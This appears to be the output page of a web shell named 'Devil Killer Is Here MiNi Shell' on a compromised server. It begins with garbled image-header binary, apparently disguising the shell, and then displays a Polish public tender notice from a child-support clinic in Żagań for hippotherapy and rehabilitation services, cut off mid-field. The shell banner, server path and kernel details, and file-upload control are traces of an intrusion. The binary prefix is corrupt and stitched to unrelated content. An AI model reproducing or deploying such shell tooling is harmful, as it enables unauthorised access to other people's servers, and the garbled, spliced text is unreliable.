JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230830/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230830/0037300901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowe wsparcie dla rodzin w ramach Rządowego Programu „Za życiem” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PORADNIA PSYCHOLOGICZNO - PEDAGOGICZNA W ŻAGANIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 970089782</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Śląska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żagań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">68-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">684772600</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pppzagan@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://poradnia.zagan.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - związek jednostek samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowe wsparcie dla rodzin w ramach Rządowego Programu „Za życiem” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7feeb90a-46ff-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00373009</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7feeb90a-46ff-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w niniejszym postępowaniu odbywa się przy pomocy Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">16.9.	Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”<br/>(„Formularze do komunikacji”). <br/>16.9.1.	Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>16.9.2.	W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym, mogą być opatrzone podpisem zewnętrznym lub wewnętrznym (otaczającym). <br/>16.10.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym<br/>zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia (szczególnie SWZ) wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>16.11.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości<br/>widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>16.12.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy<br/>do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych<br/>jako załączniki do jednego formularza).<br/>16.13.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania<br/>z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia<br/>określa Regulamin Platformy e-Zamówienia. ZALECA SIĘ STOSOWANIE AKTUALNIE WSPIERANYCH WERSJI OPROGRAMOWANIA.<br/><br/>16.14.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem<br/>Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego<br/>dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez<br/>formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl<br/>w zakładce „Zgłoś problem”.<br/><br/>16.15.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację<br/>Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia,<br/>Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres<br/>e-mail: zamowienia.publiczne@powiatzaganski.pl (nie dotyczy składania ofert w postępowaniu)<br/>16.16.	Wykonawca ma obowiązek śledzić informacje na Platformie. Podstawowym źródłem informacji jest platforma e-Zamówienia, wszelkie fakultatywne powiadomienia za pomocą poczty e-mail obciążone są ryzykiem błędów związanych z działaniem serwerów pocztowych, na których działanie Zamawiający nie ma wpływu.<br/>SZCZEGÓŁOWO WYMAGANIA DOTYCZACE KORESPONDENCJI ELEKTRONICZNEJ ZOSTAŁY OPISANE W PKT. 16 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">38.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>a)	administratorem danych osobowych jest Powiat Żagański ul. Dworcowa 39, 68-100 Żagań;<br/>b)	inspektorem ochrony danych osobowych w Powiecie Żagańskim jest Pan Maciej Gęsigóra, adres e-mai: iod@powiatzaganski.pl , tel. 68 479-34-60<br/>c)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Kompleksowe wsparcie dla rodzin w ramach Rządowego Programu „Za życiem” część I, II, III, IV<br/>Nr PPP.ZP.272.1.2023 prowadzonym w trybie podstawowym;<br/>d)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych. <br/>e)	dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>f)	obowiązek podania danych osobowych bezpośrednio dotyczących Wykonawców jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>g)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h)	osoby, których dane przetwarzamy, w związku z prowadzeniem niniejszego postepowania mają:<br/>- na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>- na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/> - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, że przetwarzanie danych osobowych ich dotyczących narusza przepisy RODO;<br/>i)	osobom, których dane przetwarzamy, w związku z prowadzeniem niniejszego postepowania nie przysługuje:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">38.2.	Informacja dotycząca ograniczenia stosowania przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016)<br/>38.2.1.	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>38.2.2.	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PPP.ZP.272.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na jedną część</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">1</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.4.1.	CZĘŚĆ I – PROWADZENIE ZAJĘĆ HIPOTERAPII<br/>a) Przedmiotem zamówienia jest prowadzenie zajęć hipoterapii w szacunkowej ilości i w podziale na lata:<br/>a.1) w roku 2023 - około 300h zegarowych (60 min) ), nie więcej niż 90h/m-c<br/>a.2) w roku 2024 - około 300h zegarowych (60 min) ), nie więcej niż 30h/m-c<br/>a.3) w roku 2025 - około 300h zegarowych (60 min) ), nie więcej niż 30h/m-c<br/>a.4) w roku 2026 - około 300h zegarowych (60 min) ), nie więcej niż 30h/m-c<br/>dla dzieci w wieku od 0 do czasu podjęcia nauki w szkole podstawowej skierowanych przez Poradnię Psychologiczno – Pedagogiczną w Żaganiu wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem” (zadanie 2.4, Priorytet II programu: Wczesne wspomaganie rozwoju dziecka i jego rodziny).;<br/>a.5) Określenie ilości godzin jest ilością szacowaną i służy do wyliczenia ceny oferty i porównania złożonych ofert. Wynagrodzenie za zrealizowanie przedmiotu umowy będzie następować miesięcznie z dołu, na zasadach określonych w treści § 3 poniżej, przy uwzględnieniu ilości faktycznie zrealizowanych godzin w danym okresie rozliczeniowym. Okresem rozliczeniowym jest okres miesiąca kalendarzowego. <br/>Za niezrealizowaną szacowaną ilość godzin nie będzie Wykonawcy przysługiwało żadne roszczenie z tego tytułu, z zastrzeżeniem lit.a.6) poniżej.<br/>a.6) minimalny zakres świadczenia w podziale na lata wynosi:<br/>- w roku 2023 - 50h zegarowych (60 min), <br/>- w roku 2024 - 100h zegarowych (60 min), <br/>- w roku 2025 - 100h zegarowych (60 min), <br/>- w roku 2026 - 100h zegarowych (60 min),<br/>b) Do obowiązków Wykonawcy będzie należeć w szczególności:<br/>b.1)	prowadzenie zajeść hipoterapii na podstawie opinii o Wczesnym Wspomaganiu Rozwoju;<br/>b.2) prowadzenie dokumentacji, m.in. karty pracy specjalisty (na koniec miesiąca rozliczeniowego), karty pracy z klientem (na koniec każdego turnusu określonego w pkt. c));<br/>	b.3) prowadzenie rejestru przyjętych osób;<br/>	b.4) wykonania czynności będących przedmiotem umowy z należytą starannością;<br/>	b.5) czuwaniem nad prawidłową realizacją niniejszego zamówienia;<br/>b.6)	przedkładania Zamawiającemu do 5-go dnia po miesiącu rozliczeniowym zestawienia z zrealizowanych zajęć, z uwzględnieniem: liczby godzin przeznaczonym na usługę i liczby osób, które z niej skorzystały (oprócz rozliczenia grudniowego, które musi wpłynąć do 20 grudnia danego roku);<br/>b.7) w razie zaistnienia potrzeby współpraca z innymi instytucjami czy podmiotami;<br/>b.8) w ramach niniejszej usługi Wykonawca jest zobligowanych do brania udziału w spotkaniach i konsultacjach zespołowych organizowanych dla rodziców/opiekunów prawnych (na wniosek Zamawiającego z uzgodnionym odpowiednio wcześniej terminem)<br/><br/>c) Planowany harmonogram zajęć zostanie podzielony na następujące Turnusy:<br/>	c.1) I turnus – od dnia zawarcia umowy do 20.12.2023r.<br/>	c.1) II turnus – od 01.01.2024r. do 30.06.2024r.<br/>	c.1) III turnus – od 01.07.2024r. do 20.12.2024r.<br/>	c.1) IV turnus – od 01.01.2025r. do 30.06.2025r.<br/>	c.1) V turnus – od 01.07.2025r. do 20.12.2025r.<br/>	c.1) VI turnus – od 01.01.2026r. do 30.06.2026r.<br/>	c.1) VII turnus – od 01.07.2026r. do 20.12.2026r.<br/><br/>d) Ilość dzieci objętych wsparciem ma charakter „otwarty” i zostanie wskazana przez Poradnię Psychologiczno – Pedagogiczną (PPP) w Żaganiu przed rozpoczęciem każdego z turnusu zgodnie z regulaminem udzielania wsparcia dla rodzin. <br/><br/>e) Realizacja niniejszej usługi będzie następować w ramach własnego „gabinetu, posiadającego wymagane prawem atesty, pozwolenia, certyfikaty etc. i spełniającego wymogi określone przepisami prawa, w tym bhp, który mieści się w odległości nie dalej niż 50 km od siedziby Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22.5.	Zamawiający wybierze ofertę, która przedstawia najkorzystniejszy bilans (maksymalna liczba punktów przyznanych w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.4.2.	CZĘŚĆ II – PROWADZENIE ZAJĘĆ REHABILITACYJNYCH<br/>a) Przedmiotem zamówienia jest prowadzenie zajęć rehabilitacyjnych w szacunkowej ilości i w podziale na lata:<br/>a.1) w roku 2023 - około 300h zegarowych (60 min), nie więcej niż 90h/m-c<br/>a.2) w roku 2024 - około 300h zegarowych (60 min), nie więcej niż 30h/m-c<br/>a.3) w roku 2025 - około 300h zegarowych (60 min), nie więcej niż 30h/m-c<br/>a.4) w roku 2026 - około 300h zegarowych (60 min), nie więcej niż 30h/m-c<br/>dla dzieci w wieku od 0 do czasu podjęcia nauki w szkole podstawowej skierowanych przez Poradnię Psychologiczno – Pedagogiczną w Żaganiu wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem” (zadanie 2.4, Priorytet II programu: Wczesne wspomaganie rozwoju dziecka i jego rodziny).;<br/>a.5) Określenie ilości godzin jest ilością szacowaną i służy do wyliczenia ceny oferty i porównania złożonych ofert. Wynagrodzenie za zrealizowanie przedmiotu umowy będzie następować miesięcznie poprzez fatyczną, zrealizowaną ilość godzin w danym miesiącu. <br/>Za niezrealizowaną szacowaną ilość godzin nie będzie Wykonawcy przysługiwało żadne roszczenie z tego tytułu, z zastrzeżeniem lit.a.6) poniżej.<br/>a.6) minimalny zakres świadczenia w podziale na lata wynosi:<br/>- w roku 2023 - 50h zegarowych (60 min), <br/>- w roku 2024 - 100h zegarowych (60 min), <br/>- w roku 2025 - 100h zegarowych (60 min), <br/>- w roku 2026 - 100h zegarowych (60 min),<br/><br/>b) Do obowiązków Wykonawcy będzie należeć w szczególności:<br/>b.1)	prowadzenie zajeść hipoterapii na podstawie opinii o Wczesnym Wspomaganiu Rozwoju;<br/>b.2) prowadzenie dokumentacji, m.in. karty pracy specjalisty ((na koniec miesiąca rozliczeniowego), karty pracy z klientem (na koniec każdego turnusu określonego w pkt. c));<br/>b.3) prowadzenie rejestru przyjętych osób;<br/>b.4) wykonania czynności będących przedmiotem umowy z należytą starannością;<br/>b.5) czuwaniem nad prawidłową realizacją niniejszego zamówienia;<br/>b.6)	przedkładania Zamawiającemu do 5-go dnia po miesiącu rozliczeniowym zestawienia z zrealizowanych zajęć, z uwzględnieniem: liczby godzin przeznaczonym na usługę i liczby osób, które z niej skorzystały (oprócz rozliczenia grudniowego, które musi wpłynąć do 20 grudnia danego roku);<br/>b.7) w razie zaistnienia potrzeby współpraca z innymi instytucjami czy podmiotami;<br/>b.8) w ramach niniejszej usługi Wykonawca jest zobligowanych do brania udziału w spotkaniach i konsultacjach zespołowych organizowanych dla rodziców/opiekunów prawnych (na wniosek Zamawiającego z uzgodnionym odpowiednio wcześniej terminem)<br/><br/>c) Planowany harmonogram zajęć zostanie podzielony na następujące Turnusy:<br/> c.1) I turnus – od dnia zawarcia umowy do 20.12.2023r.<br/> c.2) II turnus – od 01.01.2024r. do 30.06.2024r.<br/> c.3) III turnus – od 01.07.2024r. do 20.12.2024r.<br/> c.4) IV turnus – od 01.01.2025r. do 30.06.2025r.<br/> c.5) V turnus – od 01.07.2025r. do 20.12.2025r.<br/> c.6) VI turnus – od 01.01.2026r. do 30.06.2026r.<br/> c.7) VII turnus – od 01.07.2026r. do 20.12.2026r.<br/><br/>d) Ilość dzieci objętych wsparciem ma charakter „otwarty” i zostanie wskazana przez Poradnię Psychologiczno – Pedagogiczną (PPP) w Żaganiu przed rozpoczęciem każdego z turnusu zgodnie z regulaminem udzielania wsparcia dla rodzin. <br/><br/>e) Realizacja niniejszej usługi będzie następować w ramach własnego „gabinetu” posiadającego wymagane prawem atesty, pozwolenia, certyfikaty etc. i spełniającego wymogi określone przepisami prawa, w tym bhp, który mieści się na terenie Powiatu Żagańskiego, <br/>LUB w domu „klienta” w zależności od potrzeb - na terenie Powiatu Żagańskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje 